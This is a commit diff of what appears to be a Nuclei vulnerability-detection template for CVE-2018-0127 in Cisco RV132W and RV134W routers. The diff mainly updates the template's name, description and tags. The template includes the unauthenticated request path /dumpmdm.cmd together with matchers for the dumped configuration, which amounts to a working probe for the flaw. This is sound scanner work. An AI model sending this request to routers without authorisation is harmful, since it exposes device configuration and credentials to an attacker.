misc update
parent
2b477061e8
commit
2f99b4165a
|
@ -1,26 +1,27 @@
|
|||
id: CVE-2018-0127
|
||||
|
||||
info:
|
||||
name: Cisco RV132W and RV134W Wireless VPN Routers Unauthenticated Information Disclosure Vulnerability
|
||||
name: Cisco RV132W and RV134W Router Information Disclosure
|
||||
author: jrolf
|
||||
severity: critical
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-0127
|
||||
description: Detects Cisco devices vulnerable to CVE-2018-0127
|
||||
tags: cve,cve2018,cisco
|
||||
description: A vulnerability in the web interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device, which could lead to the disclosure of confidential information.
|
||||
tags: cve,cve2018,cisco,router
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/dumpmdm.cmd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Dump"
|
||||
- "MDM"
|
||||
- "cisco"
|
||||
- "admin"
|
||||
part: body
|
||||
part: body
|
Loading…
Reference in New Issue